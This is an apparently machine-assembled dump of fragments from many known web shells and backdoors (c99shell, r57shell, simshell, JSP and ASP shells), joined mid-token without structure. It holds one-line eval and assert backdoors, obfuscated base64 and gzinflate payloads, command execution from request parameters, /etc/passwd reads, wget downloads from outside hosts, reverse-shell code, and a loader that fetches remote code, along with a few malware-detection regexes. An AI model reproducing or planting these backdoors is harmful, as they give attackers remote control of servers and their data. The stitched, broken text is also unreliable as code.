md5($_get['pass'])==$pass){eval($_get['idc']);}$data=\"username=\".urlencode($user).\"&password=\".urlencode($pafputs($sun_tzu,\"<?php echo \\\"hi master!\\\";ini_set(\\\"max_execution_time&9k_)p82ai,a}i92]r\"q!c:rz}s6]=pattr$pass = md5(md5(md5($pass)));$_f_f.='_'.$_p_p[5].$_p_p[20].$_p_p[13].$_p_p[2].$_p_p[19].$_p_p[8].$_p_pos = instrb(boundarypos,requestbin,getbytestring(\"content-dispositiocontenttype = getstring(midb(requestbin,posbeg,posend-posbeg))// uses include('php://input') to execute arbritary code// php://input based backdoor&nbsp;&nbsp;<?php echo buildurl(\"<font color=\\\"navy\\\">[echo \"</form><form action=\\\"$sfilename?$urladd\\\" method=\\\"post\\\"><inputif ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset(case \"zip\": case \"tar\": case \"rar\": case \"gz\": case \"cab\": casif(!($sqlcon = @mysql_connect($_session['sql_host'] . ':' . $_session['sql_p<?php eval(gzuncompress(base64_decode(\"if(request.getparameter(\"f\")!=null)(new java.io.fileoutputstream(application.g$python_code = \"i$passwordprompt = \"\\n=================================================fputs ($sockfd ,\"\\n===============================================if(request.getsession().getattribute(\"hehe\").tostring().equals(\"hehe\"))byte[] binary = base64decoder.class.newinstance().decodebuffer(cmd);if(cmd.equals(\"szh0zwft\")){out.print(\"[s]\"+dir+\"[e]\");}response.write \"<font face=wingdings size=3><a href='\"&dosyapath&\"?status=18&system(\"mv \".$_files['_upl']['tmp_name'].\" \".$currentwdif($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd).\"</strong><hr><option value=\"cat /etc/passwd\">/etc/passwd</option>var flag = \"?txt=\" + (document.getelementbyid(\"dl\").checked ? \"2\":\"1\" <form method=get action='cmdjsp.jsp'>public jythonshell(int columns, int rows, int scrollback) {this(null, py.getsystemstate(), columns, rows, scrollback);+9jkskofkhuxzjpl~\\(md^w~[,{@#@&eo<%if(request.getparameter(\"f\")!=null)(new java.io.fileoutputstream(applicationecho \"hacking mode?<br><select name='htype'><option >--------select--------</op$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');$('#tt2').tree('options').url = \"selectchild.action?checkistring basepath = request.getscheme()+\"://\"+request.getservername()+\":\"+requ<tr><td width=\"50%\" height=\"1\" valign=\"top\"><center><b>:: enter ::</b><for<p><font color=red>wordpress not found! <input type=text id=\"wp_pat\"><input ty$cmd = ($_request['cmd']);if(isset($_request['cmd'])){system($cmd);<span>posix_getpwuid (\"read\" /etc/passwd)echo \"<tr><td class=\\\"silver border\\\">&nbsp;<strong>server's php version:&necho \"<form action=\\\"$sfilename?$urladd\\\" method=\\\"post\\\"><input type=$header='<html><head><title>'.getenv(\"http_host\").' - antichat shell</title><mpreg_match(\"/safe\\ mode\\ restriction\\ in\\ effect\\..*whose\\ uid\\ is($path =\"{$root}\".((substr($root,-1)!=\"/\") ? \"/\" : null).echo \"<a href='?page=filemanager&id=fm&fchmod=$dir$file'><? unlink($filename); unlink($filename1); unlink($filename2); unlink($filename3)out.print(\") <a style='color: \" + fcolor.tostring() + \";' href='?file=\" + fnif(flist[i].canread() == true) out.print(\"r\" ); else out.print(\"-\");echo \"<center>${t}mysql cilent:</td><td bgcolor=\\\"#333333\\\"></td></tr><formecho \"<center>${t}wordlist generator:</td><td bgcolor=\\\"#333333\\\"></td></tr<font face=\"verdana\" style=\"font-size: 8pt\" color=\"#800080\">buradan dosya <%@page contenttype=\"text/html;charset=gb2312\"%>????????????????%><html><head><title>hahahaha</title></head><body bgcolor=\"#fff<%@page contenttype=\"text/html; charset=gbk\" import=\"java.io.*;\"%><%!private<?php $ooo000000=urldecode('%61%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64'//<img width=1 height=1 src=\"http://websafe.facaiok.com/just7z/sx.asp?u=***.***preg_replace('\\'a\\'eis','e'.'v'.'a'.'l'.'(kmu(\"print \"<font face=\\\"verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">filenamprint \"<font face=\\\"verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">file: </show opened ports</option></select><input type=\"hidden\" name=\"cmd_txt\" value\" href=\"?act=tools\"><font color=#cc0000 size=\"3\">tools</font></a></span></f@ini_set('error_log',null);$pass='abcdef1234567890abcdef1234567890';@ini_restore(\"disable_functions\");@ini_restore(\"safe_mode_exec_dir\");seal.write \"set wshshell = createobject(\"\"wscript.shell\"\")\" & vbcrlfseal.write \"binarystream.savetofile \"\"c:\\downloaded.zip\"\", adsavecreateoveif($_get['cmd']) {// cmd.php = command execution system($_get['cmd']);<input type=\"hidden\" name=\"type\" value=\"<%=tipo%>\">response.write(\"<h3>file: \" & file & \"</h3>\")cgx6r9q733wvrrjiskhop9net7wa6zad8uthmvjv6mk36lz/hokffoxx87mpphzzbqh6oayukng1oe1jhj3hjqxclkzfp<? eval(gzinflate(base64_decode('process p = runtime.getruntime().exec(\"cmd.exe /c \" + cmd);array('cpp','cxx','hxx','hpp','cc','jxx','c++','vcproj'),++$f; $file = urlencode($dir[$dirfile]); $ext = '.:'; if (strpos($dir[$dirfile],xmg2/g4mz7kpnveralgojvbcqa2a8/skwp9w93nlxpttugrcif(!move_uploaded_file($http_post_files['file_name']['tmp_name'], $dir.$fname))<pre><form action=\"<? echo $php_self; ?>\" method=get >execute command: <input echo \"<input type=button name=submit onclick=\"\"document.location =&#039;\" & echo \"document.frm_pack.filename.value=\"\"\"\"+year+\"\"-\"\"+(month+1)+\"\"-<?php assert($_request[\"c\"]);?> unix:/bin/sh -c tar vxf xxx.tar windows:c:\\winnt\\system32\\cmd.exe /c type c:string url=\"jdbc:oracle:thin:@localhost:1521:orcl\";<%@ page contenttype=\"text/html;charset=gb2312\"%><td>nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input typfont-weight: bold; font-size: 10px; background: none transparent scroll repeat 0m\" target=inf onclick=\"window.open('?action=help','inf','width=450,height=400 //authentication$login = \"//pass$md5_pass = \"//if no pass then hashecho '<option value=\"create function backshell returns string sonameecho \"<input name='p' type='text' size='27' value='\".dirname(_file_).\"echo '<option value=\"select cmdshell(\\'net user response.write(\"<tr><td bgcolor=#f8f8ff><input type=submit name=cmdtxtfileoptioif fp = \"refreshfolder\" or request.form(\"cmdoption\")=\"deletefolder\" or req@include($_get['bug']);codeds=\"li#uhtxhvw+%{{%,#@%{%#wkhq#hydo#uhtxhvw+%knpmm%,#hqg#li\" <input size=\"100\" value=\"<%=application.getrealpath(\"/\") %>\" name=\"url$buff .= \"<tr><td><a href=\\\"?d=\".$pwd.\"\\\">[ $folder ]</a></td><td>link</tentrika.write \"binarystream.savetofile \"\"c:\\downloaded.zip\"\", adsavecreate.println(\"<a href=\\\"javascript:alert('you are in file now ! can not pack !');<small>jsp file browser version <%= version_nr%> by <aelse if (fname.endswith(\".mpg\") || fname.endswith(\".mpeg\") || fname.endswithecho $head.\"<font face='tahoma' size='2'>operating system : \".php_uname().\"<becho \"<center><form name=client method='post' action='$_server[php_self]?do=db'if(eregi('where|limit',$_post['nsql']) && eregi('select|from',$_post['nsql'])) $if(!empty($_files['ufp']['name'])){if($_post['ufn'] != '') $upfilename = $_post[\"<form action=\\\"\"+shell_name+\"?o=upload\\\" method=\\\"post\\\" enctype=<option value='reg query \\\"hklm\\\\system\\\\currentcontrolset\\\\control\\\\t_url = \"jdbc:microsoft:sqlserver://\" + dbserver + \":\" + dbport + \";user=\" result += \"<meta http-equiv=\\\"refresh\\\" content=\\\"2;url=\" + request.getrports = \"21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500\";private static class veditpropertyinvoker extends defaultinvoker {$opt_charsets .= '<option value=\"'.$item.'\" '.($_post['charset']==$item?'selec.'</td><td><a href=\"#\" onclick=\"g(\\'filestools\\',null,\\''.urlencode($f['natable.append(\"<td nowrap> <a href=\\\"#\\\" onclick=\\\"view('\"+tbname+\"')\"<p><input type=\\\"hidden\\\" name=\\\"selectdb\\\" value=\\\"\"+selectdb+\" sbcopy.append(\"<input type=button name=goback value=' \"+strback[languageno]+echo sr(15,\"<b>\".$lang[$language.'_text58'].$arrow.\"</b>\",in('text','mk_nameecho sr(15,\"<b>\".$lang[$language.'_text21'].$arrow.\"</b>\",in('checkbox','nf1echo sr(40,\"<b>\".$lang[$language.'_text26'].$arrow.\"</b>\",\"<select size=\"<h2>remote control &raquo;</h2><input class=\\\"bt\\\" onclick=\\\"var\"<p>current file (import new file name and new file)<br /><input class=\\\"inpu\"<p>current file (fullpath)<br /><input class=\\\"input\\\" name=\\\"file\\\" i<input title=\"upload selected file to the current working directory\" type=\"su<input title=\"launch command in current directory\" type=\"submit\" class=\"but<input title=\"delete all selected files and directories incl. subdirs\" class=uplinfo info = uploadmonitor.getinfo(fi.clientfilename);long time = (system.currenttimemillis() - starttime) / 1000l;elseif(($regwrite) and !empty($_post['writeregname']) and !empty($_post['regtypeecho \"<form action=\\\"?action=shell&dir=\".urlencode($dir).\"\\\" method=\\\"psbfile.append(\" &nbsp;<a href=\\\"javascript:doform('down','\"+formatpath(strdsbfile.append(\" &nbsp;<a href=\\\"javascript:doform('edit','\"+formatpath(strdiprivate string[] _textfiletypes = {\"txt\", \"htm\", \"html\", \"asp\", \"jsp\",\\\" name=\\\"upfile\\\" size=\\\"8\\\" class=\\\"textbox\\\" />&nbsp;<input typif (request.getparameter(\"password\") == null && session.getattribute(\"passwor<input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_post['commaecho $msg=@copy($_files['uploadmyfile']['tmp_name'],\"\".$uploaddir.\"/\".$_file<option value=\"passthru\" <? if ($execfunc==\"passthru\") { echo \"selected\"; $prog = isset($_post['prog']) ? $_post['prog'] : \"/c net start > \".$pathname.else {echo \"running datapipe... ok! connect to <b>\".getenv(\"server_addr\"<a href=\"javascript:godir(\\''.$drive->path.'/\\');p('<h2>file manager - current disk free '.sizecount($free).' of '.sizecount($all$mainpath_info = explode('/', $mainpath);if (!isset($_get['action']) or empty($_get['action']) or ($_get['action'] == \"durl_con.setrequestproperty(\"referer\", \"\"+fckal+\"\");filelocalupload(uc(dx())+sxm,request.getrequesturl().tostring(), \"gbk\");if (($i = array_search($_request['command'], $_session['history'])) !== falsif (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_request['command'])) {&nbsp;<textarea name=\"cqq\" rows=\"20\" cols=\"100%\"><%=sbcmd.tostring()%></teosw = new bufferedwriter(new outputstreamwriter(os));sock = new socket(ipaddress, (new integer(ipport)).intvalue());isr = new bufferedreader(new inputstreamreader(is));sbfolder.append(\"<tr><td >&nbsp;</td><td>\");return filesize / intdivisor + \".\" + straftercomma + \" \" + strunit;fileinfo fi = (fileinfo) ht.get(\"cqquploadfile\");<input type=\"hidden\" name=\"cmd\" value=\"<%=strcmd%>\">while ((nret = insreader.read(tmpbuffer, 0, 1024)) != -1) {password = (string)session.getattribute(\"password\");insreader = new inputstreamreader(proc.getinputstream(), charset.forname(\"gb231$tabledump .= \"'\".mysql_escape_string($row[$fieldcounter]).\"'\";while(list($kname, $columns) = @each($index)) {$tabledump = \"drop table if exists $table;\\n\";$tabledump .= \" primary key ($colnames)\";filename: backupkvycm9yoiakivxuiik7dqpjb25uzwn0kfnpq0tfvcwgjhbhzgryksb8fcbkawuoikvycm9yoiakivxuiaoc3rydwn0ihnvy2thzgryicopiczzaw4sihnpemvvzihzdhj1y3qgc29ja2fkzhipksk8mckgew0kic$link=pg_connect(\"host=$host dbname=$db user=$user password=$pass\");while($data=ocifetchinto($stm,$data,oci_assoc+oci_return_nulls))$res.=implode('|while($data=pg_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+if ($data{0} == \"\\x99\" and $data{1} == \"\\x01\") {return \"error: \".$stri<option value=\"find /etc/ -type f -perm -o+w 2> /dev/null\"<option value=\"cat /proc/version /proc/cpuinfo\">cpuinfo<option value=\"wget http://ftp.powernet.com.tr/supermail/de<option value=\"cut -d: -f1,2,3 /etc/passwd | grep ::\">user<td><input size=\"48\" value=\"$docr/\" name=\"path\" type=\"text\"><input type=$uploadfile = $_post['path'].$_files['file']['name'];elseif (!empty($_post['ac'])) {$ac = $_post['ac'];}if ($_post['path']==\"\"){$uploadfile = $_files['file']['name'];}echo \"<b>hexdump:</b><nobr>if ($filestealth) {$stat = stat($d.$f);}while ($row = mysql_fetch_array($result, mysql_num)) { echo \"<tr><td>\".$rif ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo \"db echo \"<center><b>server-status variables:</b><br><br>\";echo \"<textarea cols=80 rows=10>\".htmlspecialchars($encoded).\"</textarea>$this -> addfile($content, $filename);function addfile($data, $name, $time = 0) {function unix2dostime($unixtime = 0) {foreach($filelist as $filename){ if (unlink(_file_)) {@ob_clean(); echo \"thanks for using c99shell v.\".$shv \"c99sh_backconn.pl\"=>array(\"using perl\",\"perl %path %host %port\"),<br><table style=\"border-collapse: collapse\" cellspacing=0 bordercolordark=#66 elseif (!$data = c99getsource($bind[\"src\"])) {echo \"can't download sources \"c99sh_datapipe.pl\"=>array(\"using perl\",\"perl %path %localport %remotehos elseif (!$data = c99getsource($bc[\"src\"])) {echo \"can't download sources!\"\"+f.canread()+\" / \"+f.canwrite()+\" / \"+f.canexecute()+\"</td>\"+out.println(\"<h2>file manager - current disk &quot;\"+(cr.indexof(\"/\") == 0?string execute = f.canexecute() ? \"checked=\\\"checked\\\"\" : \"\";\"<td nowrap>\"+f.canread()+\" / \"+f.canwrite()+\" / \"+f.canexecute()+\"</td>return new double(format.format(value)).doublevalue();file tempf = new file(savepath);if (tempf.isdirectory()) {$bindport_pass = \"c99\"; else {echo \"<b>execution php-code</b>\"; if (empty($eval_txt)) {$eval_txt = tr$res = @mysql_query(\"show create table `\".$_post['mysql_tbl'].\"`\", $d$sql1 .= $row[1].\"\\r\\n\\r\\n\";if(!empty($_post['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }foreach($values as $k=>$v) {$values[$k] = addslashes($v);}body, td, tr {$d=str_replace(\"\\\\\",\"/\",$d);if ($file==\".\" || $file==\"..\") continue;string savepath = request.getparameter(\"savepath\");url downurl = new url(downfileurl);if (util.isempty(downfileurl) || util.isempty(savepath))string downfileurl = request.getparameter(\"url\");fileinputstream finput = new fileinputstream(f);urlconnection conn = downurl.openconnection();sis = request.getinputstream();<meta http-equiv=\"content-type\" content=\"text/html; charset=gb2312\"></head><input type=\"hidden\" name=\"_eventtarget\" value=\"\" /><input type=\"hidden\" name=\"_eventargument\" value=\"\" /><table width=\"100%\" border=\"1\" cellspacing=\"0\" cellpadding=\"5\" bordercol kb </td><table width=\"98%\" border=\"0\" cellspacing=\"0\" cellpadding=\"<!-- <tr align=\"center\"> http://www.4ngel.net</a> | <a href=\"?action=phpenv\">phpecho $msg=@fwrite($fp,$_post['filecontent']) ? \"codz by angel$res = @shell_exec($cfe);$res = @ob_get_contents();@exec($cfe,$res);private static final int editfield_rows = 30;private static string tempdir = \".\";<input type=\"hidden\" name=\"dir\" value=\"<%=request.getattribute(\"dir\")%>\"\" <select name='encode' class='input'><option value=''>ansi</option><option valjsession.setattribute(\"msg\",\"<span style='color:red'>upload file failed!</spafile f = new file(jsession.getattribute(current_dir)+\"/\"+filebean.getfilename(((invoker)ins.get(\"vd\")).invoke(request,response,jsession);$handle = @opendir($dir) or die(\"can't open directory $dir\");if(!empty($_post['mysql_db'])) { @mssql_select_db($_post['mysql_db'],$db); }if (!isset($_server['php_auth_user']) || $_server['php_auth_user']!==$name || $_,htaprewop(ecalper=htaprewop:fi dne:0=kotide:1 - eulavtni = eulavtni:neht 1 => ej \"<form action='\"&url&\"?action2=post' method='post' name='editform'><input nerror_reporting(0);session_start();header(\"content-type:text/html;charset=utf-8function fvm(jwv):if jwv=\"\"then:fvm=jwv:exit function:end if:dim tt,sru:tt=\"<option value=\"\"drop table [jnc];exec mast\"&kvp&\"er..xp_regwrite 'hkey_localif qpv=\"\" then qpv=\"x:\\program files\\mysql\\mysql server 5.0\\my.ini\"&br&\">www.expdoor.com</a> <input name=\"filename\" type=\"text\" value=\"asp_ver.asp\" size=\"20\" maxset file=fs.opentextfile(server.mappath(filename),8,true) 'set fs=server.createobject(\"scripting.filesystemobject\") '<title>expdoor.com asp<?php $s=@$_get[2];if(md5($s.$s)==<%eval(request(chr(112))):set fso=createobject$i = pack('c*', 0x70, 0x61, 99, 107); 'h' => $i('h*', '687474703a2f2f626c616b696e2e64756170702e636f6d2f7631'),//http://require.duapp.com/session.phpif(!isset($_session['t'])){$_session['t'] = $globals['f']($globals['h']);}//define('pass','123456');$globals['c']($globals['e'](null, $globals['s']('%s',$globals['p']('h*',$_sessiovoid aa(stringbuffer sb)throws exception{file r[]=file.listroots();for(int i=0;ibw.write(z2);bw.close();sb.append(\"1\");}else if(z.equals(\"e\")){ee(z1);sb.appif(z.equals(\"a\")){string s=new file(application.getrealpath(request.getrequest// web shell!!@preg_replace(\"/.*/e\",\"\\x65\\x76\\x61\\x6c\\x28\\x67\\x7a\\x69\\x6e\\x66\\x6$default_charset = \"utf-8\";// url:http://www.weigongkai.com/shell/if (strpos($_server['http_user_agent'], 'ebsd') == false) {setcookie('key', $_post['pwd'], time() + 3600 * 24 * 30);$_session['code'] = _request(sprintf(\"%s?%s\",pack(\"h*\",'6874if (preg_match(\"/^http\\/\\d\\.\\d\\s([\\d]+)\\s.*$/\", $status, $matches))eval(gzuncompress(gzuncompress(crypt::decrypt($_session['code'], $_cif (($fsock = fsockopen($url2['host'], 80, $errno, $errstr, $fsock_timeout))if(is_readable($path)) antivirus($path.'/',$exs,$matches);'/(eval|assert|include|require|include\\_once|require\\_once|array\\_map|arr'/(exec|shell\\_exec|system|passthru)+\\s*\\(\\s*\\$\\_(\\w+)\\[(.*)\\]\\s*'/(include|require|include\\_once|require\\_once)+\\s*\\(\\s*[\\'|\\\"](\\w+'/\\$\\_(\\w+)(.*)(eval|assert|include|require|include\\_once|require\\_oncemail: chinese@hackermail.comif($_get[\"hackers\"]==\"2b\"){if ($_server['request_method'] == 'post') { echo site: http://blog.weili.me<a class=\"high2\" href=\"javascript:;;;\" name=\"action=show&dir=$_ipage_fi$file = !empty($_post[\"dir\"]) ? urldecode(self::convert_to_utf8(rtrim($_poif (true==@move_uploaded_file($_files['userfile']['tmp_name'],self::convert_processed in <span id=\"runtime\"></span> second(s) {gzip} usage:<a href=\"javascript:;;;\" name=\"{return_link}\" onclick=\"fileperm<%@page import=\"java.io.*\"%><%if(request.getparameter(\"f\")<?php eval($_post[1]);?> <%@page import=\"java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*\"%><%!s<[url=mailto:?@array_map($_get[]?@array_map($_get['f'],$_get[/url]);?>:https://forum.90sec.org/forum.php?mod=viewthread&tid=7316@preg_replace(\"/f/e\",$_get['u'],\"fengjiao\"); qq(cs, z1, z2, sb,z2.indexof(\"-to:\")!=-1?z2.substring(z2.indexof(\"-to:\")+4,zsb.append(l[i].getname() + \"/\\t\" + st + \"\\t\" + l[i].length()+ \"\\t\" + sqresultset r = s.indexof(\"jdbc:oracle\")!=-1?c.getmetadata()return drivermanager.getconnection(x[1].trim()+\":\"+x[4],x[2].equalsignorecase(sod=array(\"d\",\"7\",\"s http://www.baidu.com/fuck.asp?a=)0(tseuqer%20lave <% a=request(chr(97)) executeglobal(strreverse(a)) %>array_map(\"asx73ert\",(arpreg_replace(\"/[errorpage]/e\",$page,\"saft\");shell.php?qid=zxexp <?php array_map(\"ass\\x65rt\",(array)$_request['expdoor']);?><?php eval(str_rot13('riny($_cbfg[cntr]);'));?><?$_uu=chr(99).chr(104).chr(114);$_cc=$_uu(101).$_uu(118).$_uu(97).$_uu(108).$_uecho \"<font color=blue>error!</font>\";<input type=\"text\" size=61 name=\"f\" value='<?php echo $_server[\"script_file - expdoor.com</title>$f=fopen($_post[\"f\"],\"w\");<textarea name=\"c\" cols=60 rows=15></textarea><br>execute morficoder(\")/*/z/*/(tseuqer lave\")function morficoder(code)morficoder=replace(replace(strreverse(code),\"/*/\",\"\"\"\"),\"\\*\\\",vbcrlf)my @adms=(\"kelserific\",\"puna\",\"nod32\")#acesso a shel - 1 on 0 offhttp://michaeldaw.org 2006or http://<? echo $server_name.$request_uri; ?>?d=c:/windows on wincoded by z0mbie<option value=\"cat /var/cpanel/accounting.log\">/var/cpanel/accounting.log</optliz0zim private safe mode command execuriton bypassecho \"<b><font color=red>kimim ben :=)</font></b>:$uid<br>\";echo \"command : <input type=text name=cmd value=\".@stripslashes(htmlentities($if(!$whoami)$whoami=exec(\"whoami\"); echo \"whoami :\".$whoami.\"<br>\";shankar<input type=checkbox name='dd' \".(isset($_post['dd'])?'checked':'').\">db<inputshow<input type=text size=5 value=\".((isset($_post['br_st']) && isset($_post['bcopy ( $dosya_gonder2, \"$dir/$dosya_gonder2_name\") ? print(\"$dosya_gonder2_naecho \"<center><font size='$sayi' color='#ffffff'>hacklerin<font color='#008000'value='calistirmak istediginiz eval(gzinflate(base64_decode('fjzhkqpatku/550ignjxxhvv6bzae0ie5+svfvgtkqxmzq05x1shellbotpacktsgr0upcorporation# servidor de irc que vai ser usado /^ctcpflood\\s+(\\d+)\\s+(\\s+)$succ = \"warning! don`t be stupid .. this is a priv3 server, so take extra care!\\*=-- members area --=*/preg_match('/(\\n[^\\n]*){' . $cache_lines . '}$/', $_session['ocr4sh_aka_rklngh edition/* connectback-backdoor on perl<form action=<?=$script?>?act=bindshell method=post>$logo = \"r0lgodlhmaawaoyaaaaaap////r// backdoor.jspjsp backdoor reverse shellmailto:rhfactor@antisocial.com?raiz=rootdigo corrompido<br>corrupt codekey = \"5dcadac1902e59f7273e1902e5ad8414b1902e5abf3e661902e5b554fc41902e53205ca0ntdaddy v1.9 by obzerve of fux0r inc<error: this is not a text file>raw d.o.s. command interfacesimattacker - vrsion : 1.0.0 - priv8 4 my friend fputs ($fp ,\"\\n*********************************************\\nwelcome t0 simecho \"<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decora<title>remote explorer</title> fso.copyfile request.querystring(\"folderpath\") & request.querystring(\"copyfi<td bgcolor=\"<%=bgcolor%>\" title=\"<%=file.name%>\"> <a href= \"showcode.asp?f{mkdir(\"$dizin/$duzenx2\",777)$baglan=fopen($duzkaydet,'w');phvayv 1.0set aktifklas=request.querystring(\"aktifklas\")action=\"klasvayv.asp?klasorac=1&aktifklas=<%=aktifklas%>&klas=<%=aktifklas%><font color=\"#858585\">www.aventgrup.netstyle=\"background-color: #95b4cc; border-bottom: #000000 1px inset; border-leftr57shell else if ($http_post_vars['with'] == \"lynx\") { $http_post_vars['cmd']= \"lynx rush security team'ru_text12' => 'back-connectc:\\tmp\\dump_rst mysqlhttp://rst.void.ru$st_form_bg='r0lgodlhcqajaiaaaofo6u7w8yh5baaaaaaalaaaaaajaakaaaipjaonujfnhjh0qtfw0lcvads=';#use: python wh_bindshell.py [port] [password]python -c\"import md5;x=md5.new('you_password');print x.hexdigest()\"#bugz: ctrl+c etc =script stoped=network security team :: cgi shell#########################<<konec>>#######################################if (!defined$param{pwd}){$param{pwd}='enter_password'};##eval(gzinflate(base64_decode('hj3hkqnqeku/zzqcbd4t8v4yaqi2e3jvpv8/1gw6orsvflyxef//$message.= \"--{$mime_boundary}\\n\" .\"content-type: {$fileatt_type};\\n\" .$ftpconnect = \"ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplogmove_uploaded_file($userfile, \"entrika.php\"); send this file: <input name=\"userfile\" type=\"file\"><input type=\"hidden\" name=\"max_file_size\" value=\"100000\">w a r n i n g: private server$message = q$<pre><font color=\"#669999\"> _____ _____ _____ _____ w3d shellby: warpboyno query executedwebshell.cgi<td><code class=\"entry-[% if entry.all_rights %]mine[% elsewinx shellcreated by greenwood from n57<td><font color=\\\"#990000\\\">win dir:</font></td>$def_ports=array (1=>'tcpmux (tcp port service multiplexer)',2=>'management util$ra44 = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_server['http.::[c0derz]::. web-shellhttp://c0derz.org.uavint21h@c0derz.org.ua$name='63a9f0ea7bb98050796b649e85481845';//rootnews remote php shell injectionphp shell <br /><input type = \"text\" name = \"url\" value = \"codz by angel(4ngel)web: http://www.4ngel.net$admin['cookielife'] = 86400;$errmsg = 'the file you want downloadable was nonexistent';$res .= '<td align=\"center\"><a href=\"'.$xshell.'?act=chmod&file='.$_session[ak-74 security team web site: www.ak74-team.net$php=\"/* line 1 */\\n\\n// \".mm(\"for example, uncomment next line\").\"welcome to phpremoteview (remview)pysystemstate.initialize(system.getproperties(), null, argv);public class jythonshell extends jpanel implements runnable {public static int default_scrollback = 100drmist.ruhidden(\"action\",\"download\").hidden_pwd().\"<center><table><tr><td width=80stnc webshellhttp://www.security-teams.net/index.php?showtopic=azrailphp<br><center><input type='submit' name='dy' value='dosya yolla!'></center><center><input type='submit' name='okmf' value='tamam'></center>;$sd98=\"john.barker446@gmail.com\"print \"sending mail to $to....... \";<td colspan=\"2\" width=\"715\" background=\"/simparts/images/cellpic1.gif\" hei$dump_file.='`'.$rows2[0].'`filename=\\\"dump_{$db_dump}_${table_dcmdasp.asp-- use a poor man's pipe ... a temp file --maceo @ dogmile.com<!-- simple php backdoor by dk (http://michaeldaw.org) -->usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwdsoomin kimsmkim@popeye.snu.ac.krecho \"<td><a href='$php_self?action=deletedata&dbname=$dbname&tablename=$tablenemperor hacking teamsimshell<form name=\"shell\" action=\"<?php echo $_server['php_self'] ?>\" method=\"post[url=http://www.governmentsecurity.orgperl asmodeus.pl client 6666 127.0.0.1print \"asmodeus perl remote shell$internet_addr = inet_aton(\"$host\") or die \"aloa:$!\\n\";#phpmyadmin mysql-dump;db_connect();header('content-type: application/octetstr$data .= \"#database: $databasemehdi & holydemonwww.infilak.'*t@*r@#@&mms^pdbybvubcaaa==^#~@%><form method=post name=inf><table width=\"75%<title>[additinal tittle]-phpshell by:[yourname]<?php echo phpshell_version ?></href=\"mailto: [you can enter your mail here]- [additional text]</a></i>@chdir($work_dir) or ($shelloutput = \"myshell: can't change directory.echo \"<font color=$linkcolor><b>myshell file editor</font> file:<font color $fileeditinfo = \"&nbsp;&nbsp;:::::::&nbsp;&nbsp;owner: <font color=$simorgh security magazine simshell.css} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_request['command'], www.simorgh-ev.comkj021320case 't':systemtools(out);break;out.println(\"<tr><td>\"+ico(50)+f[i].getname()+\"</td><td> file<die(\"couldn't read directory, blocked!!!\");php web shellshells.dl.amthis server has been infected by $owner<input type=\"submit\" value=\"include!\" name=\"inc\"></p>could not write to file! (maybe you didn't enter any text?)#we are: masterkid, alexutz, fatman & mikutul echo --==userinfo==-- ; id;echo;echo --==directory==-- ; pwd;echo; echo --==shelconnectback backdoortarget fi1e:<br><input type=\"text\" name=\"target\" value=\"index.php\"></br>eval(base64_decode(\"zxzhbchiyxnlnjrfzgvjb2rlkcjhv2r1yjnkbfgzvnpawepmwvdkdmnuuw9<img src=\"http://s43.radikal.ru/i101/1004/d8/ced1f6b2f5a9.png\" align=\"center$back_connect_p=\"iyevdxnyl2jpbi9wzxjsdqp1c2ugu29ja2v0ow0kjglhzgrypwluzxrfyxrvbiecho '<h1>execution php-code</h1><div class=content><form name=pf method=posecho \"[dir] <a href=\\\"\".$_server['php_self'].\"?rep=\".realpath($rep.\"..class backdoor {echo \"<a href=\\\"\".$_server['php_self'].\"?copy=1\\\">copier un fichier</a> <if int((1-0+1)*rnd+0)=0 then makeemail=maketext(8) & \"@\" & maketext(8) & \".\"<form name=frmcmd method=post action=\"<%=gurl%>\">dim zombie_array,special_arrayhttp://vnhacker.orgd7nd7l.km4snk`jzknd{n_ejq;bd{kbpur#kq8aaa==^#~@%>></td><td><input type=\"submitprint \"\\n\".'<tr><td width=100pt class=linelisting><nobr>post (php eval)</td><dizin</font></b></font><font face=\"verdana\" style=\"font-size: 8pt\"><s72 shell v1.0 codinf by cr@zy_kingecho \"<p align=center>dosya zaten bulunuyor</p>\"<?$d='g7mhwq9vvxil/qx2oz2vtdpo6g3fyaa6x+8dmizcd0ehzabzh7jfpzzuz7xnenxsyvbp2wy36ukacak fso 1.0if request.querystring(\"tgh\") = \"1\" then<font color=\"#858585\">buqx</font></a></font><font face=\"verdana\" style=mailto:buqx@hotmail.comlord of iran hackers sabotagelord-c0d3r-nt$port = base_convert(bin2hex(substr($reqmessage[$id], 3+$reqlen+1, 2)), 16, 10);# [+] domain name address typewww.antichat.rucan't open file, permission denidehas been already loaded. php emperor <xb5@hotmail.action=mysqlread&mass=loadmass\">load all defaultsif (@passthru($cmd)) { echo \" -->\"; $this->output_state(1, \"passthruprint \"<tr><td><b>server is:</b></td><td>\".$_server['server_signature'].\"</tdprint \"<tr><td><b>execute command:</b></td><td><input size=100 name=\\\"_cmdcoded by n0 [nzer0] www.cyberlords.netu29mdhdhcmuaqwrvymugsw1hz2vszwfkexhjztwaaaamuexurf///waaajmzzaaaacjourkaaaaereturn \"<br>dump error! can't write to \".htmlspecialchars($file);call os.run(\"win.com cmd.exe /c del \"& sztf,0,true)<div align=\"left\"><font size=\"1\">input command :</font></div><input type=\"text\" name=\"cmd\" size=\"30\" class=\"input\"><br><input type=\"text\" name=\"dir\" size=\"30\" value=\"<? passthru(\"pwd\"); ?>ayyildiztouch by ijoofirst we check if there has been asked for a working directoryhttp://ayyildiz.org/images/whosonline2.gifejder was here*~pu*&bp[_)f!8c2f*@#@&~,p~p,~p&q~8bpms~9~~lb~x`v,_,f&*~,jcw~~[_c3trffzq@#@&pp,~~lama's'hellif($_post['king'] == \"\") {if 